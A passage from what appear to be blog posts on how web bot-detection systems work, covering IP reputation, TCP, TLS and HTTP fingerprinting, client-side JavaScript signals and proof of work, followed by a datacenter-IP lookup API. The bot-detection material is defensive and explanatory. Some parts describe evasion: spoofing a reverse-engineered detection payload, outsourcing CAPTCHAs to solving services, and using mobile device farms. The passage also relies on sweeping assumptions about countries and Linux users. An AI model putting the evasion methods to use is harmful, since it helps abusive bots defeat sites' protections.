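    ipaddress.ip_network("198.51.100.0/24"): "ExampleISP",
    ipaddress.ip_network("203.0.113.0/24"): "ExampleProxyProvider",
}


def operator_of(ip: str) -> Optional[str]:
    """Return the operator of the network that contains `ip`, if known."""
    address = ipaddress.ip_address(ip)
    for network, operator in PREFIX_TO_OPERATOR.items():
        if address in network:
            return operator
    return None


def looks_like_dns_leak(resolver_ip: str, http_client_ip: str) -> bool:
    """True if the DNS resolver and the HTTP client belong to different operators."""
    if resolver_ip == http_client_ip:
        return False
    resolver_operator = operator_of(resolver_ip)
    client_operator = operator_of(http_client_ip)
    if resolver_operator is None or client_operator is None:
        return False  # unknown network: do not flag
    return resolver_operator != client_operator


if __name__ == "__main__":
    print(looks_like_dns_leak("192.0.2.10", "198.51.100.5"))  # same operator
    print(looks_like_dns_leak("192.0.2.10", "203.0.113.9"))   # different operators
```

<p>A mismatch is only a weak signal. Many legitimate users configure a public DNS resolver that does not belong to their ISP, so this check should only contribute to an overall score.</p>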
<p>After the IP address of the domain name has been obtained, the browser is ready to establish a connection with the web server.</p>
<p>Before a browser is able to display anything, a TCP and a TLS handshake have to occur to establish a connection to the web server (in case we are using an HTTPS connection, which is almost always the case nowadays).</p>
<figure>
<img src="https://incolumitas.com/images/tslHandshake.svg" alt="TCP and TLS handshake" />
<figcaption>Before the index.html file is downloaded, a TCP and TLS handshake has to happen.<span style="font-size: 70%">(Source: https://hpbn.co/building-blocks-of-tcp/)</span></figcaption>
</figure>
<p>As soon as the first incoming SYN packet arrives on the web server, an anti bot system is capable of performing the following lookups on the server side:</p>
<ol>
<li>
<p>Obtain the source IP address of the client. As soon as we have the source IP address, we can do a wide range of <strong>IP reputation checks</strong>:</p>
<ul>
<li>IP address counter: Check if we already have received too many requests from this specific IP address in a certain time frame. Abort the TCP handshake by sending a RST packet if that's the case.</li>
<li>Also increase the counter for the specific (assumed) subnet to which this IP address belongs. Many attackers are in possession of whole IPv4 and IPv6 subnets, so counting per single IP address alone is not enough.</li>
<li>Lookup the IP address on spam abuse databases such as <a href="https://www.spamhaus.org/">spamhaus.org</a>. Are there any databases that indicate that this IP address was used for spamming/botting purposes?</li>
<li>Conduct a <a href="https://incolumitas.com/pages/Datacenter-IP-API/">datacenter IP lookup</a> for the IP address. If the IP address belongs to a datacenter, it's more likely that it's a bot compared to a residential IP address. Similarly, you can also check if an IP address belongs to a large residential ISP such as Comcast, AT&T or Deutsche Telekom.</li>
<li>Look up the geographical location for this IP address. Is it a tier 1 country (rich countries in the west such as the United Kingdom or Switzerland)? Or is the country known for spamming/botting (Ukraine, Vietnam, Russia - nothing personal here)?</li>
<li>Look up the ASN, organization or registry to which the IP address belongs. This can be done using the <code>whois</code> command. For example, <code>whois 15.23.65.22</code>.</li>
<li>Use IP address metadata services such as <a href="https://ipinfo.io/">ipinfo.io</a> or <a href="https://ip-api.com/">https://ip-api.com/</a> to infer more metadata for this IP address.</li>
<li>Make a reverse lookup for an IP address with the <code>host</code> command. Example: <code>host 80.185.115.25</code>. If the hostname belongs to a trustworthy company, give it a better reputation. If it belongs to an untrustworthy organization, block it.</li>
</ul>
</li>
<li>
<p>Generate a <a href="https://github.com/NikolaiT/zardaxt/">TCP/IP fingerprint</a> from the SYN packet. A TCP/IP fingerprint gives us information about the assumed operating system of the client based on certain TCP and IP header fields and values, such as the TCP options field. The TCP/IP fingerprint alone does not have enough entropy to reasonably exclude a client. However, when the inferred OS seems to be a Linux system, then it's valid to raise the bot score, since most legit users do not use Linux. The TCP/IP fingerprint can be altered and spoofed by the client!</p>
</li>
<li>Measure TCP/IP latencies and the RTTs of the exchanged packets. What's the throughput? Can we infer that the client used a WiFi network?</li>
</ol>
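<p>The first two IP reputation checks from the list above (a counter per IP address and a counter per assumed subnet) could be sketched roughly as follows. This is only a minimal illustration: the class name <code>RequestCounter</code>, the thresholds and the assumption that the first three octets of an IPv4 address form the subnet are all hypothetical and not taken from any real anti bot product.</p>

```javascript
// Sliding-window request counter keyed by IP address and by assumed /24 subnet.
// All names and thresholds are hypothetical and only serve as illustration.
class RequestCounter {
  constructor(windowMs, maxPerIp, maxPerSubnet) {
    this.windowMs = windowMs;
    this.maxPerIp = maxPerIp;
    this.maxPerSubnet = maxPerSubnet;
    this.hits = new Map(); // key -> array of timestamps in milliseconds
  }

  // Assumption: the first three octets of an IPv4 address identify the subnet.
  static subnetOf(ip) {
    return ip.split('.').slice(0, 3).join('.') + '.0/24';
  }

  // Record one hit for `key` and return the number of hits inside the window.
  record(key, now) {
    const recent = (this.hits.get(key) || []).filter(t => now - t < this.windowMs);
    recent.push(now);
    this.hits.set(key, recent);
    return recent.length;
  }

  // Returns true if the connection should be refused (for example with a RST).
  shouldBlock(ip, now = Date.now()) {
    const ipCount = this.record('ip:' + ip, now);
    const subnetCount = this.record('net:' + RequestCounter.subnetOf(ip), now);
    return ipCount > this.maxPerIp || subnetCount > this.maxPerSubnet;
  }
}

// Usage: allow at most 100 requests per IP and 1000 per subnet per minute.
const counter = new RequestCounter(60 * 1000, 100, 1000);
console.log(counter.shouldBlock('203.0.113.7')); // first request is not blocked
```

<p>A real system would keep these counters in a shared store and would also handle IPv6 prefixes, which this sketch ignores.</p>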
<p>After the initial TCP/IP handshake is completed, the TLS handshake comes next. After the TLS handshake is completed, the server is able to compute a <a href="https://www.net.in.tum.de/fileadmin/TUM/NET/NET-2020-04-1/NET-2020-04-1_04.pdf">TLS handshake fingerprint</a>.</p>
<p>I am not a specialist regarding TLS fingerprinting, but my guess is that a TLS fingerprint has slightly more entropy compared to a TCP/IP fingerprint and makes it possible to differentiate between different TLS implementations and maybe operating systems. If that is the case, then at this point it would already be possible to see if there is a mismatch between the OS inferred from the TCP/IP fingerprint and the OS inferred from the TLS fingerprint. However, keep in mind that TLS and TCP/IP fingerprints can easily be forged on the client side.</p>
<p>After the TLS handshake has been established, the client sends an initial HTTP GET request to fetch the requested URL. Let's assume the client requests the <code>index.html</code> document. Based on this very first GET request, we can do a couple of things:</p>
<ul>
<li>Compute an HTTP fingerprint. What headers are sent by the client? In what order are they sent? How are the header names capitalized?</li>
<li>Do the HTTP headers contain typical proxy headers such as </li>
</ul>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">proxy_headers</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'Forwarded'</span><span class="p">,</span> <span class="s1">'Proxy-Authorization'</span><span class="p">,</span>
<span class="s1">'X-Forwarded-For'</span><span class="p">,</span> <span class="s1">'Proxy-Authenticate'</span><span class="p">,</span>
<span class="s1">'X-Requested-With'</span><span class="p">,</span> <span class="s1">'From'</span><span class="p">,</span>
<span class="s1">'X-Real-Ip'</span><span class="p">,</span> <span class="s1">'Via'</span><span class="p">,</span> <span class="s1">'True-Client-Ip'</span><span class="p">,</span> <span class="s1">'Proxy_Connection'</span><span class="p">];</span>
</code></pre></div>
<ul>
<li>Does the HTTP Referer look suspicious?</li>
<li>Is the HTTP version not from a modern browser but from a non-browser library such as <code>curl</code> or Python <code>requests</code>?</li>
</ul>
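<p>The proxy header check mentioned above can be sketched as a small function. The header list is the one shown earlier; the function name <code>findProxyHeaders</code> and the plain object used as input are assumptions made for this example. The comparison is done case-insensitively, because servers such as Node.js expose header names in lower case.</p>

```javascript
// Header names that typically indicate a proxy (list taken from above).
const PROXY_HEADERS = ['Forwarded', 'Proxy-Authorization',
  'X-Forwarded-For', 'Proxy-Authenticate',
  'X-Requested-With', 'From',
  'X-Real-Ip', 'Via', 'True-Client-Ip', 'Proxy_Connection'];

// Hypothetical helper: returns the names of all request headers that
// match one of the known proxy headers, ignoring upper/lower case.
function findProxyHeaders(headers) {
  const wanted = new Set(PROXY_HEADERS.map(name => name.toLowerCase()));
  return Object.keys(headers).filter(name => wanted.has(name.toLowerCase()));
}

// Usage with a made-up request header object.
const suspicious = findProxyHeaders({
  'User-Agent': 'Mozilla/5.0',
  'via': '1.1 example-proxy',
  'X-Forwarded-For': '198.51.100.4',
});
console.log(suspicious); // header names that hint at a proxy
```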
<p>If all checks pass until this point, the web server is going to serve the contents of the <code>index.html</code> document. After the <code>index.html</code> document has been downloaded, the browser parses the page and loads linked images, CSS and JavaScript files.</p>
<p>The executed JavaScript in turn dynamically fetches more content which results in more HTTP requests, WebSocket streams and other forms of networking requests.</p>
<p>At this point, the anti bot detection system is ready to serve its JavaScript client library that collects signals from the browser side.</p>
<h2>Bot Detection Techniques on the Client Side with JavaScript</h2>
<p>As soon as JavaScript is executed in the browser, there are a lot of different techniques to harvest data that help to decide whether the client is a bot or not.</p>
<p>Keep in mind that the JavaScript execution environment is controlled by the client! So is the data that is sent back to the web server!</p>
<p>Bot detection companies use many different techniques to camouflage their JavaScript signals collection libraries:</p>
<ol>
<li><a href="https://antoinevastel.com/javascript/2019/09/09/improving-obfuscator.html">JavaScript obfuscation</a></li>
<li>JavaScript virtual machines</li>
<li>Encryption and encoding of payloads sent back to the server (only makes sense in combination with obfuscation/virtual machines)</li>
</ol>
<p>Those three obfuscation techniques remind me a bit of the old days of reverse engineering. However, it's much much harder to protect JavaScript code than to protect x86 assembly.</p>
<p>There are some reasons for that:</p>
<ul>
<li>JavaScript is an interpreted high level language</li>
<li>Obfuscated JavaScript must conform to the ECMAScript specification</li>
<li>Obfuscated JavaScript will at some point also be in AST (Abstract Syntax Tree) representation </li>
<li>The obfuscated JavaScript must be supported by many browsers and needs to be performant</li>
</ul>
<p>A well known JavaScript obfuscation tool is <a href="https://github.com/javascript-obfuscator/javascript-obfuscator">javascript-obfuscator</a>. A good JavaScript de-obfuscation tool is <a href="https://github.com/lelinhtinh/de4js">de4js</a>.</p>
<h4>Quick Interlude</h4>
<p>For example, when I look for apartments on the German real estate search engine <a href="https://www.immobilienscout24.de/">immobilienscout24.de</a>, I am sometimes presented a bot detection challenge that performs a check passively in the background.</p>
<p>This is the <a href="https://incolumitas.com/data/imperva.js">heavily obfuscated JavaScript file</a> that does the bot detection work in the background. I spent around 30 minutes trying to understand what it does, but honestly I could not figure out much without spending more time. I only know that the script performs some checks and sends the following payload back to the server, where <code>p</code> is a 30KB long base64 encoded binary blob:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"solution"</span><span class="p">:{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"interrogation"</span><span class="p">:{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"p"</span><span class="p">:</span><span class="s2">"h6R2UwMDY2NnRfZ18oNUBwVTJKVWtNZnFqc2ZndX5NaHZyOGpf...[truncated]"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"st"</span><span class="p">:</span><span class="mi">1626613924</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"sr"</span><span class="p">:</span><span class="mi">113884550</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"cr"</span><span class="p">:</span><span class="mi">994722218</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"></span>
<span class="w"> </span><span class="nt">"version"</span><span class="p">:</span><span class="s2">"stable"</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"></span>
<span class="w"> </span><span class="nt">"old_token"</span><span class="p">:</span><span class="kc">null</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"error"</span><span class="p">:</span><span class="kc">null</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"performance"</span><span class="p">:{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"interrogation"</span><span class="p">:</span><span class="mi">1006</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>The next steps in reverse engineering would be to find out what exactly <code>p</code> contains. Look at the place in the obfuscated JavaScript where <code>p</code> becomes encrypted/encoded and dump the clear text contents. Then I know what data is sent and I can therefore spoof it.</p>
<p>I am heavily assuming that the <a href="https://incolumitas.com/data/imperva.js">above JavaScript</a> is <a href="https://www.imperva.com/products/advanced-bot-protection-management/">Imperva's</a> bot detection client side solution.</p>
<hr>
<p>Before I dive deeper into some of the JavaScript bot detection techniques, I want to explain why collecting signals passively with JavaScript and stopping bots is so difficult. Assuming the execution time of the bot detection script is 200ms, the data is then transmitted to the web server in 50ms, and the web server in turn has to make an API request to the central bot detection API (again 50ms), 300ms have already passed before the client can be banned.</p>
<p>This means that all signals recorded by JavaScript that are sent to the bot detection API incur a large delay before a decision can be made on the server side.</p>
<p>This is also the reason why many bot detection companies decide upfront to interrupt the browsing session of the user and display a message that an active bot detection check is happening. <a href="https://www.cloudflare.com/products/bot-management/">Cloudflare Bot Management</a> does this for example.</p>
<p>However, in this blog article I focus on passive detection without interrupting the user's workflow.</p>
<p>What if our goal is to only scrape a single page? Then an attacker can simply abort the execution of said script. Maybe the server then remembers: Hey, this specific client with IP XYZ never actually sent a JavaScript payload back home. Looks unusual: One of the following cases had to happen:</p>
<ol>
<li>There was a network outage</li>
<li>The user navigated away before the JavaScript payload could be sent home</li>
<li>The system / browser crashed</li>
<li>The user blocked the execution of the script deliberately to evade bot detection</li>
</ol>
<p>Only the last point indicates malicious behavior of the client. Therefore, every bot detection system needs to give each client some free attempts. Let's say the IP address gets blocked once a threshold of <code>N=20</code> missing payloads has been surpassed.</p>
<p>But what if the user switches his IP address between requests? For example by using a mobile 4G or 5G proxy that sits behind a <a href="https://en.wikipedia.org/wiki/Carrier-grade_NAT">Carrier-grade NAT</a>?</p>
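<p>Such a threshold of free attempts could be tracked as sketched below. The class <code>MissingPayloadTracker</code> and its method names are hypothetical; the sketch simply counts pages that were served to an IP address without a JavaScript payload coming back.</p>

```javascript
// Counts, per IP address, how many pages were served without receiving
// the JavaScript payload afterwards. Names are made up for illustration.
class MissingPayloadTracker {
  constructor(threshold = 20) {
    this.threshold = threshold;
    this.outstanding = new Map(); // ip -> pages served without a payload
  }

  // Call when a page containing the detection script was served.
  pageServed(ip) {
    this.outstanding.set(ip, (this.outstanding.get(ip) || 0) + 1);
  }

  // Call when the detection script sent its payload back home.
  payloadReceived(ip) {
    const n = this.outstanding.get(ip) || 0;
    if (n > 0) this.outstanding.set(ip, n - 1);
  }

  // Block only after the number of missing payloads surpassed the threshold.
  isBlocked(ip) {
    return (this.outstanding.get(ip) || 0) > this.threshold;
  }
}

// Usage: a client that never sends a payload gets blocked after N=20 misses.
const tracker = new MissingPayloadTracker(20);
for (let i = 0; i < 21; i++) tracker.pageServed('203.0.113.9');
console.log(tracker.isBlocked('203.0.113.9'));
```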
<p>You can't just block a whole mobile address range because you feel like it. Wikipedia says:</p>
<blockquote>
<p>In cases of banning traffic based on IP addresses, the system might block the traffic of a spamming user by banning the user's IP address. If that user happens to be behind carrier-grade NAT, other users sharing the same public address with the spammer will be mistakenly blocked. This can create serious problems for forum and wiki administrators attempting to address disruptive actions from a single user sharing an IP address with legitimate users.</p>
</blockquote>
<p>What I describe above is something <strong>very fundamental</strong> about bot detection systems: <strong>They must provide basic functionality without relying on JavaScript signals</strong>. Not only because every network message originating from the client is potentially spoofed, but also because some browsers simply cannot execute JavaScript or fail in the process of doing so! Some users don't have JavaScript enabled. Banning the IP address only because the client disabled JavaScript is too aggressive.</p>
<p>And there is another very important point here: <strong>Bot detection systems can only reliably ban clients by IP address!</strong> This is so important to understand. Every other signal from the client can be spoofed (if the client understands what he executes on his machine)! </p>
<p>If a bot detection system bans based on other ways of identification (Browser fingerprint, WebGL fingerprint, font fingerprint, TLS Fingerprint, TCP/IP fingerprint, ...), a client can change those fingerprints and evade a ban!</p>
<p>Having said that, let's look at some techniques to detect bots on the client side:</p>
<ol>
<li>Browser Fingerprinting with JavaScript is a very popular method. The idea is to collect as much browser entropy such as <code>navigator.languages</code> or <code>navigator.platform</code> as possible, while simultaneously trying to look for attributes that are static and don't change on browser/OS updates.</li>
<li>Proof of work challenges such as solving cryptographic puzzles in the browser, as for example <a href="https://friendlycaptcha.com/">friendlycaptcha.com</a> does. The rough idea is: Make the browser search for an input to a hash function such that the first <code>K</code> bits of the hash are all zeroes. This takes some time.</li>
<li>Another common bot detection method is to produce unique fingerprints with the browser's built-in WebGL rendering system that accesses the client's graphics hardware. For example, <a href="https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/45581.pdf">Google Picasso</a> detects the client's operating system class by leveraging the unique outputs of the WebGL renderer. They deliberately only want to reliably detect the device/operating system, simply because most spammers/botters use cheap cloud/hosting infrastructure, which mostly runs Linux flavors.</li>
<li>JavaScript can be used to <a href="https://incolumitas.com/2021/01/10/browser-based-port-scanning/">port scan</a> the client's internal network. This makes it possible to find out if certain suspicious well known ports are open, such as the one for the remote debugging protocol (9222) or the one for <code>adb</code> (5037). Furthermore, it also makes it possible to check if the client has a router accessible by scanning for <code>192.168.1.1</code>.</li>
<li>Recording behavioral data by listening to DOM events such as <code>onmousemove</code>, <code>onscroll</code>, <code>onkeydown</code>.</li>
<li>Then there exist a wide range of techniques to detect automation frameworks such as puppeteer or playwright or mismatches in the browser JavaScript environment which indicate that the browser was messed with. <a href="https://abrahamjuliot.github.io/creepjs/">creep.js</a> is probably one of the best tools out there for that purpose.</li>
<li>Lastly, the technique that is still most used is the good old CAPTCHA. Google's <a href="https://www.google.com/recaptcha/about/">reCAPTCHA</a> or the newer <a href="https://www.hcaptcha.com/">hCAPTCHA</a> are well known solutions.</li>
<li>In general, JavaScript allows bot detection services to collect an ENORMOUS amount of data from browsers. JavaScript leaks so much information, it's unfathomable. Just to throw some words into the mix: Browser red pills, WebRTC leaks, scanning the internal network...</li>
</ol>
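<p>To make the proof of work idea from the list above more concrete, here is a minimal sketch for Node.js. It is not how friendlycaptcha.com or any other product implements it: the choice of SHA-256, the <code>challenge:nonce</code> input format and all function names are assumptions for this example.</p>

```javascript
const crypto = require('crypto');

// Count the number of leading zero bits in a Buffer.
function leadingZeroBits(buf) {
  let bits = 0;
  for (const byte of buf) {
    if (byte === 0) { bits += 8; continue; }
    bits += Math.clz32(byte) - 24; // clz32 counts over 32 bits, a byte uses the low 8
    break;
  }
  return bits;
}

// Assumed puzzle format: SHA-256 over "<challenge>:<nonce>".
function hashOf(challenge, nonce) {
  return crypto.createHash('sha256').update(challenge + ':' + nonce).digest();
}

// Client side: brute force a nonce until the first k bits of the hash are zero.
function solve(challenge, k) {
  for (let nonce = 0; ; nonce++) {
    if (leadingZeroBits(hashOf(challenge, nonce)) >= k) return nonce;
  }
}

// Server side: verifying a solution costs only a single hash computation.
function verify(challenge, nonce, k) {
  return leadingZeroBits(hashOf(challenge, nonce)) >= k;
}

// Usage: every additional bit in k doubles the expected work for the client.
const nonce = solve('example-challenge', 12);
console.log(nonce, verify('example-challenge', nonce, 12));
```

<p>The asymmetry is the point of the design: the client needs on average <code>2^K</code> hash computations, while the server needs exactly one to check the answer.</p>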
<p>The <strong>Proof of Work</strong> kind of challenges cannot be bypassed by clients. They have to be solved somewhere. However, the solving of the proof of work challenge does not have to be on the browser/client that receives the challenge.</p>
<p>Crypto proof of work challenges can be solved by dedicated cryptography hardware; they do not need to be solved by the browser. This speeds things up considerably. I would guess that solving crypto hashing challenges on dedicated hardware is between 20 and 200 times faster than with JavaScript.</p>
<p>Solving captchas such as Google's <a href="https://www.google.com/recaptcha/about/">reCAPTCHA</a> can be outsourced to captcha solving services, such as for example <a href="https://www.deathbycaptcha.com/">deathbycaptcha.com</a> or <a href="https://2captcha.com/">2captcha.com</a>.</p>
<p>Even the solutions to more complex challenges such as <a href="https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/45581.pdf">Google Picasso</a> can be pre-computed. All you need is a network of different devices and access to a browser with JavaScript enabled. If you have a website with 10k unique visitors per month, you probably will be fine.</p>
<h2>Conclusion</h2>
<p>Bot detection systems consist of IP reputation techniques and client side data gathering scripts. They need to work reliably even if their client side JavaScript libraries send spoofed data.</p>
<p>Because of that potential spoofing, bot detection <a href="https://incolumitas.com/data/imperva.js">JavaScript libraries</a> are heavily obfuscated to make it harder for attackers to understand how they work. Proof of work challenges do not have to be solved by the client that received the challenge - they can be outsourced.</p>
<p>There are two fundamental approaches to defeating bot detection:</p>
<ol>
<li>Don't participate in the cat and mouse race between bot detection companies and botters and use real devices with legit IP addresses (such as mobile device farms) to conduct your attacks. This is very costly in terms of hardware and data plans.</li>
<li>Use cheap AWS cloud infrastructure and high reputation proxies and then spoof the JavaScript payload from the bot detection JavaScript in order to appear legit. This requires a very high understanding of JavaScript and reverse engineering and is thus very costly regarding time and expertise. </li>
</ol>
<p>Only one thing is for sure: All that bot detection companies are doing is <strong>raising the transaction costs for automation on the Internet</strong>. But we live in times where platforms are becoming more monopolized and powerful each passing day.</p>
<p>At the same time, mobile phones become cheaper and cheaper. In our modern times, a mobile phone basically constitutes a digital identity. But all you need to acquire such an identity is 100USD to buy a cheap phone and a cheap data plan for 7.99USD a month. If bot detection companies do their job too well, spammers will simply create mobile device farms and conduct their botting/spamming/attacks with those device farms.</p>
<p>Detecting real automated mobile devices is much much harder than detecting Headless Chrome on AWS... As of now, I only know a few ways to detect such a mobile device farm:</p>
<ul>
<li>Portscan for an open <code>adb</code> port with JavaScript</li>
<li>Check the JavaScript <a href="https://developer.mozilla.org/en-US/docs/Web/API/Accelerometer">Accelerometer API</a> and <a href="https://developer.mozilla.org/en-US/docs/Web/API/Gyroscope">Gyroscope</a>. Zero-movement velocity and rotation data is quite suspicious for mobile phones.</li>
<li>Maybe some statistical analysis that a website suddenly has a surge in traffic from cheap or old Android smartphones from the same CGNAT which might indicate a mobile device farm as source of the traffic...</li>
</ul>API to Check if an IP Address belongs to a Datacenter / Cloud Provider2021-06-20T17:45:00+02:002021-06-20T17:45:00+02:00Nikolai Tschachertag:incolumitas.com,2021-06-20:/2021/06/20/check-if-an-IP-Address-belongs-to-a-datacenter/<p>For security reasons, it's often helpful to check if an IP Address belongs to a datacenter or cloud computing provider such as Amazon AWS or Microsoft Azure. Therefore, I have developed a simple public API that helps you to check if an IP address belongs to a datacenter / cloud provider.</p><p><a class="orange_button" href="https://incolumitas.com/pages/Datacenter-IP-API/">Visit the dedicated page for the API</a></p>
<h2>Introduction</h2>
<p>The emergence of cloud providers enabled bot programmers and spammers to make use of cheap and scalable cloud computing infrastructure for their bots. As a business and website owner, it's in your best interest that your visitors are organic human beings and not automated programs that leverage the functionality of your website.</p>
<p>Consider the scenario where you own an e-commerce business and you want to sell a limited edition of your product and you know in advance that the demand for the product will far outnumber the supply (as happened with the <a href="https://www.businessinsider.com/playstation-5-launch-day-us-europe-flooded-by-reseller-bots-2020-11">Playstation 5 release</a>).</p>
<p>Those bots are called <strong>resell bots</strong> and they buy your limited edition product as soon as it appears on the page in order to resell it later on Ebay for a higher price.</p>
<p>But there are many more use cases for malicious bots: Ad fraud, scraping bots, price/stock monitoring bots, credential stuffing bots and many others.</p>
<p>Often those bots are hosted on Amazon AWS, Digitalocean or Hetzner cloud computing infrastructure (To name a few hosting providers).</p>
<p>When you can infer that the IP address of a visitor on your website belongs to a datacenter / cloud provider you can decide to block this IP.</p>
<p><strong>Put differently:</strong> What normal human being is using a cloud provider IP address when browsing the Internet?</p>
<h2>API for IP Address Datacenter / Cloud Provider Check</h2>
<p>Now it's time to introduce the API that allows you to check if a certain IP belongs to a datacenter / cloud provider.</p>
<p>You can reach the API endpoint with this URL: <strong>https://abs.incolumitas.com/datacenter?ip=</strong></p>
<p>If you pass the IP address <code>3.5.140.2</code> to the API by calling <a href="https://abs.incolumitas.com/datacenter?ip=3.5.140.2">https://abs.incolumitas.com/datacenter?ip=3.5.140.2</a>, you'll obtain the result:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"3.5.140.2"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"region"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ap-northeast-2"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"service"</span><span class="p">:</span><span class="w"> </span><span class="s2">"AMAZON"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"network_border_group"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ap-northeast-2"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>Alternatively, you can also look up IPv6 addresses. Try the URL <a href="https://abs.incolumitas.com/datacenter?ip=2406:dafe:e0ff:ffff:ffff:ffff:dead:beef">https://abs.incolumitas.com/datacenter?ip=2406:dafe:e0ff:ffff:ffff:ffff:dead:beef</a>, which yields:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2406:dafe:e0ff:ffff:ffff:ffff:dead:beef"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"region"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ap-east-1"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"service"</span><span class="p">:</span><span class="w"> </span><span class="s2">"AMAZON"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"network_border_group"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ap-east-1"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>If you don't specify any IP address with the <code>ip=</code> query parameter and you invoke <a href="https://abs.incolumitas.com/datacenter">https://abs.incolumitas.com/datacenter</a> directly, the client's own IP address will be used for lookup. In my case, I get the following output:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"84.155.231.57"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"service"</span><span class="p">:</span><span class="w"> </span><span class="s2">"No match for this IP address"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>because my private ISP IP address obviously doesn't belong to a datacenter.</p>
<p>Usage with JavaScript:</p>
<div class="highlight"><pre><span></span><code><span class="nx">fetch</span><span class="p">(</span><span class="s1">'https://abs.incolumitas.com/datacenter'</span><span class="p">)</span>
<span class="p">.</span><span class="nx">then</span><span class="p">(</span><span class="nx">response</span> <span class="p">=></span> <span class="nx">response</span><span class="p">.</span><span class="nx">json</span><span class="p">())</span>
<span class="p">.</span><span class="nx">then</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">data</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">data</span><span class="p">)</span>
<span class="p">})</span>
</code></pre></div>
<p>The IP address ranges for the cloud providers are kept up to date and the IP ranges are pulled from the upstream sources every 4 hours.</p>
<h4>More Examples for the IP Address Datacenter API</h4>
<p>In the following section, I will show examples for looking up IP addresses belonging to the three biggest cloud providers AWS, Azure and GCP:</p>
<p>Looking up an Azure IP address: <a href="https://abs.incolumitas.com/datacenter?ip=20.41.193.225">https://abs.incolumitas.com/datacenter?ip=20.41.193.225</a></p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"20.41.193.225"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"AzurePortal"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"region"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"regionId"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"platform"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Azure"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"systemService"</span><span class="p">:</span><span class="w"> </span><span class="s2">"AzurePortal"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>Looking up an AWS IP address: <a href="https://abs.incolumitas.com/datacenter?ip=3.5.140.2">https://abs.incolumitas.com/datacenter?ip=3.5.140.2</a></p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"3.5.140.2"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"region"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ap-northeast-2"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"service"</span><span class="p">:</span><span class="w"> </span><span class="s2">"AMAZON"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"network_border_group"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ap-northeast-2"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>Looking up a GCP IP address: <a href="https://abs.incolumitas.com/datacenter?ip=23.236.48.55">https://abs.incolumitas.com/datacenter?ip=23.236.48.55</a></p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"23.236.48.55"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"service"</span><span class="p">:</span><span class="w"> </span><span class="s2">"GCP"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
